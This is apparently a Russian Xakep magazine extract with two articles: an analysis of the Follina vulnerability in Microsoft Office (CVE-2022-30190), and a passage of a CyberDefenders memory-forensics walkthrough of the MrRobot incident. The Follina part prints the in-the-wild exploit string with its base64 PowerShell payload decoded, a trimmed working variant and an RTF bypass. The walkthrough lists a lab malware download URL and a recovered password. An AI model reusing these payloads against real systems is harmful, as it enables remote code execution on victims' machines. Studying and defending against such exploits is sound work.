книги хакеры / журнал хакер / xa-279_Optimized

ИЗУЧАЕМ НАШУМЕВШУЮ УЯЗВИМОСТЬ

В MICROSOFT OFFICE

Follina по своему­ уникаль­ на­ . Она не требует­ активации­ макросов­ , при этом позволя­ ет­ выполнять­ произволь­ ный­ код с привиле­ гиями­ вызывающе­ го­ при ­ ложения­ . Теоретичес­ ки­ запущенный­ вредонос­ может изрядно порезвить­ ся­ в скомпро­ мети­ рован­ ной­ системе­ : устанав­ ливать­ программы­ , просматри­ вать­ , изменять­ или удалять­ данные­ , а еще — создавать­ новые учетные­ записи. Причем­ корпорацию­ Microsoft оператив­ но­ предуп­ редили­ , что обнаруже­ на­ зияющая дыра в безопасности­ Ofce, но компания­ не предпри­ няла­ по этому­ поводу никаких мер, посчитав­ угрозу­ несерьезной­ . Как выяснилось­ , очень напрасно­ .

Проблема­ скрывает­ ся­ в Microsoft Diagnostic Tool (MSDT) — утилите­ ,

которая собирает­ информацию­ для отправки­ в службу­ техничес­ ­кой поддер­ ­ жки Microsoft и формиру­ ­ет отчеты­ об ошибках­ . Любопытно­ , что экспло­ ­ит мож ­ но использовать­ даже без открытия­ документа­ Microsoft Word, для этого­ дос ­ таточно­ лишь навести­ курсор­ мыши на загружен­ ­ный файл в провод­ ­нике: вре ­ доносный­ скрипт сработа­ ­ет в превью документа­ . Однако­ обо всем по поряд ­ ку.

Первым­ файл с экспло­ итом­ обнаружил­ на VirusTotal исследова­ тель­ , скры ­ вающийся­ под псевдонимом­ nao_sec: документ был загружен­ на VT в апре ­ ле 2022 года с белорусско­ го­ IP-адреса­ . Следом­ за изучение­ опасного­ файла­ взялся­ IT-эксперт Кевин Бомонт и опубликовал­ в своем­ блоге­ подробное­ описание­ уязвимос­ ти­ . Он же дал ей название­ : расшифро­ ван­ ный­ им образец­ кода в файле­ включал­ ссылку­ на RAR-архив с именем­ 05-2022-0438.rar, а 0438 — это телефонный­ код итальянско­ го­ городка­ Follina. Если открыть документ с экспло­ итом­ , этот RAR-архив скачива­ ется­ на атакуемый­ компьютер­

и сохраня­ ­ется во времен­ ­ную папку­ .

Та самая ссылка­ , давшая­ название­ уязвимос­ ти­

О том, как работает­ эта уязвимость­ , получившая­ в итоге­ обозначение­ CVE- 2022-30190, подробно­ расска­ ­зыва­ли в исследова­ ­нии эксперты­ из Huntress. При распаков­ ­ке файла­ с экспло­ ­итом они получили­ все компонен­ ­ты, составля­ ­

ющие документ Microsoft Ofce.

Компонен­ ­ты, составля­ ­ющие вредонос­ ­ный документ. Иллюстра­ ­ция с сай­

та huntress.com

Среди­ этих составля­

ющих­

в папке­ word/_rels/ расположен­

стандар­ тный­

XML-файл document.xml.rels, в котором содержится­

список­

связей­

для основного­ XML-файла­ word/document.xml. В document.xml сосредото­

­

чено полезное­

содержимое­

документа­ Word, и, если он не имеет­ связей­

с внешними­

объекта­ ми­ или ресурсами­

, файл document.xml.rels обычно­

пуст. В нашем случае­

там содержался­

код,

включающий­

ссылку­ на некую

внешнюю­

веб страницу­

,

расположен­

ную­

по адресу­

hxxps[:]//www.

xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l. html.

Код в файле­ document.xml.rels

Сейчас­ сайт, где лежал файл, уже недоступен­ , но некоторое­ время­ назад исследова­ ­телям все же удалось­ скачать­ с него ту самую веб страницу­ . Этот HTML-документ содержал­ тег <script> и большое­ количество­ закомменти­ ­ рованных­ символов­ А.

Содер­ жимое­ файла­ RDF842l.html

Изначаль­ но­ исследова­ тели­ не могли­ понять, для чего нужны­ эти закомменти­ ­ рованные­ строки­ , но без них экспло­ ит­ не работал. Парни­ из Huntress испро ­ бовали­ множес­ тво­ вариантов­ : разные­ символы­ , размещение­ закомменти­ ­ рованного­ блока­ выше или ниже полезной­ нагрузки­ , пока не обнаружи­ лось­ , что функция­ обработ­ ки­ HTML-модуля MSDT имеет­ жестко­ закодирован­ ный­ размер­ буфера и для срабаты­ вания­ экспло­ ита­ объем­ вредонос­ ного­ файла­ должен­ превышать­ 4096 байт.

Внижней­ части­ HTML-кода содержался­ зашифрован­ ­ный скрипт, в котором

иреализован­ основной код экспло­ ­ита:

window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param

"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_

SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(

Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.

GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[

char]

34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc

3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traW

xsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSB

oaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9y

ICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAve

SYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLn

QgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[

char]34+'))'))))i/../../../../../../../../../../../../../../Windows/

System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"";!0

Действу­ ет­ он следующим­ образом­ . С использовани­ ем­ стандар­ тно­ го­ механизма­ Microsoft Diagnostic Tool вызывается­ встроенная­ в Windows утилита­ поиска­ неполадок­ PCWDiagnostic с параметром­ просмотра­ файла­ IT_BrowseForFile, в качестве­ которого­ ей подсовыва­ ется­ скрипт PowerShell, спрятан­ ный­ в параметре­ $(). После­ расшифров­ ки­ из Base64 этот скрипт имеет­ такой вид:

$cmd = "c:\windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /

f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\

public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&

findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c

-F:* .&&rgb.exe";

Если­ записанный­ в переменную­ $cmd путь к командно­ му­ интерпре­ тато­ ру­ cmd. exe верен, скрипт запускает­ ся­ в командной­ строке­ и открывает­ невидимые­ окна, в которых выполняют­ ­ся следующие­ действия­ :

•убивает­ ­ся процесс­ msdt.exe, если он запущен;

•в ранее скачан­ ­ном архиве­ 05-2022-0438.rar ищется­ строка­ Base64,

вкоторой хранит­ ­ся зашифрован­ ­ный CAB-файл;

•этот файл извлекает­ ­ся и сохраня­ ­ется под именем­ 1.t;

•сохранен­ ­ный файл расшифро­ ­выва­ется и сохраня­ ­ется в текущий каталог под именем­ 1.c;

•вызыва­ ­ется на исполнение­ приложе­ ­ние rgb.exe, которое предположи­ ­ тельно­ хранилось­ внутри­ CAB-файла­ 1.c. Назначение­ этого­ приложе­ ­ния

вданный­ момент неизвес­ ­тно, посколь­ ­ку сайт, с которого­ грузил­ ­ся исходный архив, больше­ не доступен­ .

Чтобы­ лучше­ понять, как работает­ экспло­ ит­ , исследова­ тели­ заменили­ вызов несуществу­ юще­ го­ приложе­ ния­ демонстра­ цией­ окошка­ с системным­ уведом­ ­ лением­ — вот как сработав­ ший­ экспло­ ит­ выглядел­ в их виртуал­ ке­ .

Наглядная­ демонстра­ ция­ работы Follina

Последу­ ющие­ эксперимен­ ты­ показали­ , что некоторые­ синтакси­ чес­ кие­ выражения­ в коде Follina совсем­ необязатель­ ны­ для выполнения­ полезной­ нагрузки­ , и исследова­ телям­ из Huntress удалось­ значитель­ но­ оптимизи­ ровать­ код экспло­ ита­ , сократив­ его до следующей­ лаконичной­ конструк­ ции­ :

location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "

IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=

/../../$(calc)/.exe"";

Наибо­ лее­ важными­ для успешного­ выполнения­ кода оказались­ следующие­ моменты­ :

•в начале параметра­ IT_BrowseForFile требует­ ­ся как минимум два обхода­ каталога­ /.../;

•код, обернутый­ в $(), выполнялся­ через PowerShell, но пробелы­ нарушают­

его работу;

• расширение­ .exe должно­ быть последним­ завершающим­ значени­ ­ем в конце­ параметра­ IT_BrowseForFile.

Таким­ образом­ , Follina позволя­ ет­ запустить­ в системе­ произволь­ ный­ исполняемый­ файл, притом­ для этого­ необязатель­ но­ отключать­ в Word защиту от выполнения­ макросов­ , посколь­ ку­ уязвимость­ эксплу­ ати­ рует­ совер ­ шенно другой­ механизм. Баг присутс­ тву­ ет­ в версиях­ Ofce 2013, 2016, Ofce Pro Plus апрельской­ версии­ (Windows 11 с майски­ ми­ обновлениями­ ) и версии­ Ofce 2021 со всеми­ патчами­ . Вот пример­ содержащего­ экспло­ ит­ документа­ , который рассылали­ в почтовом­ спаме­ .

Пример­ вредонос­ ного­ документа­ , содержащего­ экспло­ ит­

Правда­ , при срабаты­ ­вании экспло­ ­ита в Microsoft Ofce активизи­ ­рует­ся защита Protected View, демонстри­ ­рующая содержимое­ потенциаль­ ­но опас ­ ного документа­ в режиме «только­ для чтения­ », но ее можно­ обойти­ , сохранив­ файл с экспло­ ­итом в формате­ RTF. Более того: в этом случае­ его даже не нуж ­ но открывать­ в Word — этот экспло­ ­ит будет вызван­ уже в момент появления­ превью документа­ в панели предваритель­ ­ного просмотра­ провод­ ­ника

Windows.

Follina срабаты­ вает­ при просмотре­ превью вредонос­ ного­ документа­ в провод­ нике­

Есть и еще один очень важный­ момент: полезная­ нагрузка­ может обращать­ ся­ к удален­ ным­ узлам, принад­ лежащим­ злоумыш­ ленни­ кам­ . При таком соеди ­ нении на удален­ ный­ узел будет передавать­ ся­ хеш NTLM, а это означает­ , что киберпрес­ тупни­ ки­ получат хеш пароля Windows жертвы­ , который может быть использован­ для дальнейшей­ постэкс­ плу­ ата­ ции­ .

При соединении­ передается­ хеш NTLM

Эта техника­ атаки­ запускает­ код под учетной­ записью пользовате­ ля­ , который открыл вредонос­ ный­ документ или просмотрел­ его в провод­ нике­ . Иными­ сло ­ вами, злоумыш­ ленник­ начнет­ атаку­ как пользователь­ с низкими­ привиле­ гиями­ (без прав админис­ тра­ тора­ ), но затем может использовать­ этот доступ­ для дальнейших­ атак, чтобы­ повысить привиле­ гии­ и получить расширен­ ный­ доступ­ к целевой среде­ .

Подыто­ живая­ , можно­ сказать­ , что на твоем­ компе­ сработа­ ла­ Follina, если наблюда­ ются­ следующие­ тревож­ ные­ признаки­ :

•процесс­ Microsoft Word создает­ дочерний­ процесс­ msdt.exe;

•запущен­ процесс­ sdiagnhost.exe с дочерним­ процес­ ­сом conhost. exe.

Харак­ терные­ признаки­ срабаты­ вания­ полезной­ нагрузки­ Follina

Любопыт­ но­ , что корпорация­ Microsoft была своевре­ мен­ но­ проинформи­ рова­ ­ на об этой уязвимос­ ти­ , но посчитала­ , что она «не имеет­ отношения­ к безопасности­ », — соответс­ тву­ ющую­ переписку­ опубликовал­ участник­ Shadow Chaser Group (ассоциация­ студен­ тов­ колледжей­ , занимающаяся­ поиском­ и анализом­ APT) crazyman.

Скрин переписки­ пользовате­ ля­ crazyman и Microsoft

Без патча­ единствен­ ­ным разумным­ способом­ противос­ ­тоять Follina было уда ­ ление ассоциации­ для файлов­ MS-MSDT в реестре­ Windows, за которую отве ­ чает ветвь HKCR:\ms-msdt. Это можно­ сделать­ с помощью команды­ reg delete HKEY_CLASSES_ROOT\ms-msdt /f или с использовани­ ­ем скрипта­ на PowerShell от Кельвина­ Тегелара­ . В таком случае­ сработав­ ­ший экспло­ ­ит не сможет­ вызвать­ MS-MSDT, что предот­ ­вра­тит запуск вредонос­ ­ной прог ­ раммы.

Microsoft пока не выпустила­ патч для исправления­ уязвимос­ ­ти в MSDT, за что подверга­ ­ется справед­ ­ливой критике­ . В любом случае­ , как известно­ , на многих­ компьюте­ ­рах обновления­ отключены­ , а об установ­ ­ке их вручную­ часто­ речи и вовсе­ не заходит. Поэтому­ , думается­ , пользовате­ ­ли еще долго­ будут удивленно­ вскрикивать­ «опа, шинанай!», когда­ Follina в очеред­ ­ной раз внезап­ ­но запустит­ в их системе­ что нибудь вредонос­ ­ное.

rayhunt454 grigadan454@gmail.com

В этой статье мы проведем­							рассле­ дова­		ние­		инциден­ та­
на примере­			лаборатор­ ной­			работы MrRobot с ресурса­
CyberDefenders. Мы научимся­ извлекать­
								основные артефак­ ­
	ты из образов­			оператив­	ной­	памяти Windows и восста­ новим­
процесс­		атаки­ .

Сценарий­ в задании такой: сотрудник­ компании­ сообщил­ , что ему пришло­ электрон­ ­ное письмо­ с обновлением­ безопасности­ , он запустил­ вложение­ и после­ этого­ компьютер­ начал вести­ себя странно­ . Группа­ реагирова­ ­ния

на инциден­ ­ты получила­ дампы­ оператив­ ­ной памяти с подозритель­ ­ных машин. Наша задача — исследовать­ их, найти­ то самое письмо­ , выявить загружен­ ­ные вредонос­ ­ные программы­ и методы бокового­ перемещения­ по сети.

По результатам­ решения кейса­ необходимо­ ответить­ на ряд вопросов­ , но я покажу сам процесс­ решения и не буду озвучивать­ ответы­ . Ты можешь повторить­ все самостоятель­ но­ , чтобы­ лучше­ разобрать­ ся­ и закрепить­ материал­ .

Итак, загрузим­ файл архива­ с артефак­ ­тами и приступим­ к их исследова­ ­ нию.

ИСПОЛЬЗУЕМЫЕ УТИЛИТЫ

1.Volatility Framework 2.6.1 — инстру­ ­мент, реализован­ ­ный на Python вер ­

сии 2 и предназна­ ­чен­ный для извлечения­ артефак­ ­тов из образцов энер ­ гозависимой­ памяти.

2.Bulk extractor — инстру­ ­мент для извлечения­ структуриро­ ­ван­ной информа ­ ции, к примеру­ адресов­ электрон­ ­ной почты­ , URL, доменов.

3.YARA Editor — программа­ для тестирова­ ­ния и создания­ правил­ YARA.

ИСПОЛЬЗУЕМЫЕ ПЛАГИНЫ VOLATILITY2 ДЛЯ ИЗВЛЕЧЕНИЯ ДАННЫХ

1.Imageinfo — плагин­ для определе­ ­ния операци­ ­онной системы­ , пакета обновлений­ и аппарат­ ­ной архитек­ ­туры исследуемо­ ­го образа­ .

2.Pstree — позволя­ ­ет просматри­ ­вать список­ процес­ ­сов в виде дерева.

3.Handles — показывает­ открытые­ дескрип­ ­торы к файлам­ , разделам­ реес ­ тра, мьютексам­ , именован­ ­ным каналам, спрятан­ ­ным в процес­ ­сах. Также­ позволя­ ­ет отобразить­ дескрип­ ­торы для конкрет­ ­ного процес­ ­са и конкрет­ ­ ного типа объекта­ .

4.Consoles — плагин­ для поиска­ команд, которые злоумыш­ ­ленни­ки ввели­ в окне cmd.exe. Основное его преиму­ ­щес­тво — плагин­ не только­ показы ­

вает введен­ ные­ злоумыш­ ленни­ ками­ команды­ , но и собирает­ весь экранный буфер (ввод и вывод).

5.Memdump — извлекает­ все резидентные­ страницы­ памяти в процес­ се­ .

6.Filescan — плагин­ для поиска­ объектов­ FILE_OBJECT в памяти

с помощью сканиро­ ­вания тегов пула. Найдет­ все открытые­ файлы­ .

7.Dumpfiles — извлекает­ кеширован­ ­ные файлы­ из образа­ памяти.

8.Netscan — ищет сетевые артефак­ ­ты в 32- и 64-разрядных­ дампах­ памяти. Плагин­ находит конечные­ точки­ TCP, UDP, локальные­ и удален­ ­ные IP-адре ­ са.

9.Printkey — ищет значения­ в указан­ ­ном разделе­ реестра­ Windows.

10.Userassist — позволя­ ­ет получить информацию­ из ключа­ реестра­

UserAssist.

11.Mftparser — сканиру­ ­ет записи главной­ таблицы­ файлов­ (MFT) в памяти и выводит информацию­ о времен­ ­ных метках­ файлов­ .

12.Autoruns — подклю­ ­чаемый плагин­ , который ищет точки­ сохранения­ исполняемых­ файлов­ в системе­ . Для его подклю­ ­чения необходимо­ добавить плагин­ в каталог plugins инстру­ ­мен­та Volatility.

13.Malfind — плагин­ для поиска­ скрытого­ или внедренно­ ­го в память процес­ ­ сов кода.

Распаковы­ ­ваем архив с заданием­ и получаем­ три файла­ , которые содержат­ образы­ памяти скомпро­ ­мети­рован­ных хостов­ : Target1, Target2 и POS. Файлы­ имеют­ расширение­ .vmss, то есть представ­ ­ляют собой моменталь­ ­ные сним ­ ки виртуаль­ ­ной машины VMware. Если Volatility не может извлечь артефак­ ­ты из этих файлов­ , можно­ восполь­ ­зовать­ся плагином­ raw2dmp, который пре ­ образует­ дамп памяти приоста­ ­нов­ленной виртуаль­ ­ной машины VMware в формат­ , пригод­ ­ный для анализа­ . Также­ можно­ восполь­ ­зовать­ся инстру­ ­мен ­

том vmss2core.

Иссле­ дова­ ние­ образов­ оператив­ ной­ памяти можно­ разделить­ на два эта ­ па: восста­ нов­ ление­ действий­ пользовате­ ля­ и поиск признаков­ вредонос­ ной­ активности­ . На первом­ этапе­ необходимо­ проана­ лизи­ ровать­ запущенные­ процес­ сы­ , открытые­ документы­ , восста­ новить­ историю­ браузе­ ра­ . Эта информация­ поможет определить­ время­ компро­ мета­ ции­ системы­ , а также­ выяснить­ , какие действия­ пользовате­ ля­ привели­ к инциден­ ту­ . А проана­ лизи­ ­ ровав активность злоумыш­ ленни­ ка­ , нужно­ найти­ использован­ ные­ вредонос­ ­ ные модули, способ­ их закрепле­ ния­ в системе­ , а также­ обнаружить­ методы бокового­ перемещения­ по сети организа­ ции­ .

ИССЛЕДОВАНИЕ ХОСТА TARGET1

Получим­ первичную­ информацию­ об исследуемой­ машине, выясним­ профиль­ операци­ ­онной системы­ , сетевой адрес и имя хоста­ .

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 imageinfo`

Информа­ ция­ о профиле­ операци­ онной­ системы­

В ключе­ реестра­ SYSTEM\ControlSet001\Control\ComputerName\ ComputerName содержится­ информация­ об имени­ компьюте­ ­ра.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 printkey -K "ControlSet001\Control\C

omputerName\ComputerName"

Имя компьюте­ ра­

Имя компьюте­ ­ра — FRONT-DESK-PC.

Получим­ сетевой адрес хоста­ : в ключе­ реестра­ SYSTEM\ControlSet001\ Services\Tcpip\Parameters\Interfaces содержатся­ идентифика­ ­торы сетевых адаптеров­ , в одном из которых хранит­ ­ся информация­ о сети.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 printkey -K "ControlSet001\Services\Tcpip\

Parameters\Interfaces\{9C3710A4-77FE-48CB-911B-742A81DE38BA}"

IP-адрес хоста­

Профиль­ скомпро­ ­мети­рован­ной машины — Win7SP1x86_23418, IP-адрес —

10.1.1.20, имя хоста­ — FRONT-DESK-PC.

Начнем­ восста­ нав­ ливать­ действия­ пользовате­ ля­ в системе­ . Первым­ делом получим информацию­ о запущенных­ процес­ сах­ и сохраним­ ее в файл для удобства­ анализа­ .

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 pstree > pstree.txt0

Дерево­ запущенных­ процес­ сов­

Мы видим запущенный­ процесс­ OUTLOOK.EXE с идентифика­ тором­ 3196. В его адресном пространс­ тве­ содержится­ информация­ об электрон­ ных­ сообщени­ ­ ях и открытых­ файлах­ . Получим переписку­ авторизо­ ван­ ного­ в Outlook поль ­ зователя­ . Для этого­ выгрузим­ все файлы­ данного­ процес­ са­ и проана­ лизи­ ­ руем их: в дескрип­ торе­ открытого­ процес­ са­ с идентифика­ тором­ 3196 найдем­ все объекты­ FILE.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 handles -p 3196 -t FILE > handles_3196.

txt0

Откры­ тые­ файлы­ процес­ са­ OUTLOOK.exe

Мы обнаружи­ ли­ файл с расширени­ ем­ .ost, который содержит­ кеширован­ ные­ (сохранен­ ные­ в памяти системы­ ) сообщения­ электрон­ ного­ почтового­ ящика­ пользовате­ ля­ . Попробу­ ем­ восста­ новить­ этот файл, используя­ плагин­ dumpfiles, но сначала­ нам необходимо­ узнать физический­ адрес данного­ файла­ в памяти. Запустим­ плагин­ filescan, найдем­ интересу­ ющий­ нас файл и получим его физический­ адрес.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 handles -p 3196 -t FILE > filescan.txt0

Физичес­ кий­ адрес файла­ outlook2.ost

Адрес­ файла­ outlook2.ost — 0x000000003ecec2b0. Теперь можно­ восста­ ­

новить сам файл. В параметре­ -Q плагина­ dumpfles указыва­ ем­ адрес файла­ , который нужно­ выгрузить­ .

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003ecec2b0 -D

dumpfiles/0

Я попробовал­ восста­ ­новить все файлы­ контей­ ­нера outlook, но они оказались­ пустыми­ . Восполь­ ­зуем­ся другим­ методом выгрузки­ сообщений­ . Для этого­ получим дамп адресного­ пространс­ ­тва процес­ ­са OUTLOOK.EXE с помощью плагина­ memdump.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 memdump -p 3196 -D ./0

Мы получили­ дамп адресного­ пространс­ тва­ , попробу­ ем­ в нем найти­ сооб ­ щения. Откроем­ полученный­ файл в шестнад­ цатерич­ ном­ редакторе­ и найдем­ строку­ From, а также­ Content-Type.

Обнаружен­ ный­ заголовок­ письма­

	Содер­ жимое­	электрон­	ного­	письма­
Проана­ ­лизи­руем его заголовок­ :		нас интересу­			ют­	поля Subject, From
и Received.

Как анализи­ ровать­ заголовки­ электрон­ ных­ писем, расска­ зыва­ ется­ в одной из наших статей­ .

Письмо­ пришло­ от пользовате­ ля­ th3wh1t3r0s3@gmail.com и имело­ тему Обновите ваш VPN клиент. Поле Received характеризу­ ет­ адрес отправите­ ­ ля, а также­ показывает­ , через какие узлы сообщение­ прошло­ .

Находим­ первое­ поле Received и узнаем­ , что сообщение­ отправлено­ с IPадреса­ 10.114.2.82. Как видно­ из содержимого­ , там присутс­ тву­ ет­ ссылка­ http://180.76[.]254[.]120/AnyConnectInstaller.exe для загрузки­ фай ­

ла AnyConnectInstaller.exe.

Выгрузим­ этот файл из образа­ памяти.

Физичес­ кий­ адрес файла­ AnyConnectInstaller.exe

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003df1cf00 -D c69-

Grrcon2015/target1/dumpfiles0

Мы получили­ файл file.None.0x85d1c6c0.img. Возьмем­ MD5-сумму­ и про ­ верим на VirusTotal, чтобы­ выяснить­ первичную­ информацию­ о файле­ .

Затем­ проверим­ полученный­ модуль с помощью YARA-правил­ .

Детект­ выгружен­ ного­ вредоно­ са­

Получен­ ­ный вредонос­ ­ный модуль относит­ ­ся к семейству­ XtremeRAT. Анализи­ ­руем дальше­ . Теперь нам нужно­ получить список­ исполняемых­

файлов­ , запущенных­ пользовате­ ­лем. Для этого­ необходимо­ проана­ ­лизи ­ ровать информацию­ из ключа­ userassist ветки­ реестра­ NTUSER.DAT. Для этого­ восполь­ ­зуем­ся плагином­ userassist.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 userassist > c69-Grrcon2015/target1/

userassist0

Информа­ ­ция из userassist

Как видно­ из рисунка­ , в 11:31:27 09.10.2015 UTC пользователь­ запустил­ загружен­ ный­ в почтовый­ клиент­ файл AnyConnectInstaller.exe. После­ запуска­ вредоно­ са­ злоумыш­ ленник­ получил доступ­ к компьюте­ ру­ .

Найдем­ методы закрепле­ ния­ на скомпро­ мети­ рован­ ной­ машине. Для этого­ восполь­ зуем­ ся­ плагином­ autoruns.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 autoruns > c69-Grrcon2015/target1/autoruns

Автозапуск­ исполняемо­ го­ файла­ AnyConnectInstaller.exe

Чтобы­ закрепить­ ся­ и обеспечить­ работу после­ перезагрузки­ компьюте­ ра­ , запускают­ исполняемый­ файл AnyConnectInstaller.exe, для этого­ в ключе­

реестра­ SOFTWARE\Microsoft\Windows\CurrentVersion\Run было добав ­

лено значение­ MrRobot. Проведем­ небольшой­ анализ­ файла­ , для чего заг ­ рузим его в IDA Pro.

Участок­ кода вредоно­ ­са

Вредонос­ ный­ файл использует­ знакомые­ нам функции­ WinAPI

CreateProcessA, GetThreadContext, WriteProcessMemory. Применя­ ется­ техника­ ProcessHollowing для загрузки­ кода в созданный­ процесс­ . Поведен ­ ческий анализ­ из информации­ на VirusTotal показывает­ , что вредонос­ создает­ процесс­ с названи­ ем­ IEXPLORE.EXE.

Информа­ ция­ о созданном­ процес­ се­

Найдем­ этот процесс­ в дереве процес­ сов­ .

Информа­ ция­ о процес­ се­ iexplore

Вредонос­ ­ный файл создал­ процесс­ iexplore.exe с идентифика­ ­тором 2996, далее методом ProcessHollowing загрузил­ исполняемый­ код в этот про ­ цесс. Для анализа­ дальнейших­ действий­ злоумыш­ ­ленни­ка выгрузим­ дамп процес­ ­са с идентифика­ ­тором 2996.

Найдем­ уникаль­ ­ное значение­ вредоно­ ­са в системе­ (Mutex). В Windows есть объект­ ядра Mutant, который позволя­ ­ет программам­ синхро­ ­низи­ровать ­ ся между­ собой. Вредонос­ ­ные файлы­ часто­ используют­ именован­ ­ный мьютекс для того, чтобы­ предот­ ­вра­тить повторный­ запуск в системе­ .

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 handles -p 2996 -t MUTANT0

Поиск­ созданно­ ­го мьютекса­ процес­ ­са iexplore.exe

Чтобы­ предот­ вра­ тить­ повторный­ запуск, вредонос­ ный­ модуль создал­ мьютекс fsociety0.dat. Теперь получим NTLM-хеш пользовате­ ля­ Administrator, для чего восполь­ ­зуем­ся плагином­ hashdump.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 hashdump0

NTLM-хеш пользовате­ ­ля Administrator

Восста­ ­новим дальнейшие­ действия­ злоумыш­ ­ленни­ка. Для этого­ восполь­ ­ зуемся­ плагином­ consoles.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 consoles > c69-Grrcon2015/target1/

consoles0

Резуль­ тат­ вывода утилиты­ consoles

Злоумыш­ ленник­ загрузил­ три основные утилиты­ в каталог C:\Windows\Temp: wce.exe — редактор­ учетных­ данных­ Windows, nbtscan.exe — программа­

для сканиро­ вания­ локальной­ сети на наличие Windows-машин, getlsasrvaddre.exe позволя­ ет­ получить список­ сессий­ залогинен­ ных­ поль ­ зователей­ Windows и извлечь LM/NT-хеши.

С помощью утилиты­ wce.exe злоумыш­ ­ленник получил пароль flagadmin@1234 пользовате­ ­ля Administrator.

		Получе­			ние­ пароля пользовате­	ля­ Administrator
Далее­	злоумыш­		ленник­		залогинил­ ся­ в системе­		от имени­ админис­ тра­ тора­
и запустил­ командную­				оболоч­ ку­ .

Запуск­ командной­ строки­ от имени­ админис­ тра­ тора­

Найдем­ дату создания­ утилиты­ nbtscan.exe. Для этого­ проана­ лизи­ руем­ MFT-таблицу­ с использовани­ ем­ плагина­ mftparser.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 mftparser | grep nbtscan.exe0

			Анализ­ MFT-таблицы­
Дата­ создания­	утилиты­	: 2015-10-09 10:45:12 UTC. Теперь			посмотрим­
на содержимое­	каталога­ C:\Windows\Temp. Там среди­ прочего­				обнаружи­	­
вается­ файл nbs.txt.

Поиск­ файла­ nbs.txt

Получим­ его содержимое­ , восполь­ ­зовав­шись утилитой­ dumpfiles: адрес файла­ в памяти 0x000000003fdb7808.

python2 vol.py -f c69-Grrcon2015/target1/Target1-1dd8701f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdb7808 -D c69-

Grrcon2015/target1/dumpfiles0

Содер­ жимое­ файла­ nbs.txt

Итак, мы выяснили­ , что IP-адрес первой­ машины — 10.1.1.2. Проана­ лизи­ ­ руем сетевую активность хоста­ , для этого­ восполь­ зуем­ ся­ плагином­ netscan.

Сетевая­ активность

Вредонос­ ­ный процесс­ iexplore.exe с идентифика­ ­тором 2996 взаимо­ ­дей ­ ствует­ с управляющим­ сервером­ по адресу­ 180.76.254.120:22. Далее зло ­ умышленни­ ­ки подклю­ ­чились к хосту­ 10.1.1.21 по протоко­ ­лу RDP. Чтобы­ управлять скомпро­ ­мети­рован­ной машиной, атакующие­ установи­ ­ли на нее

TeamViewer.exe.

На данном­ этапе­ мы проана­ лизи­ рова­ ли­ оператив­ ную­ память хоста­ Target1, нашли­ точку­ входа­ в сеть организа­ ции­ . Используя­ фишинговое­ сообщение­ , содержащее­ заголовок­ письма­ Udate your VPN Client, злоумыш­ ленник­ th3wh1t3r0s3@gmail.com отправил­ вредонос­ ную­ ссылку­ . Пользователь­ машины Target1 загрузил­ исполняемый­ файл AnyConnectInstaller.exe, после­ запуска­ которого­ атакующий­ установил­ контроль­ над компьюте­ ром­ . Затем он загрузил­ дополнитель­ ные­ утилиты­ и повысил привиле­ гии­ в системе­ . Наконец, злоумыш­ ленник­ подклю­ чил­ ся­ к хосту­ 10.1.1.21 по протоко­ лу­ RDP, используя­ пароль flagadmin@1234 пользовате­ ля­ Administrator.

Продолжение статьи0 →

ИССЛЕДОВАНИЕ МАШИНЫ TARGET2

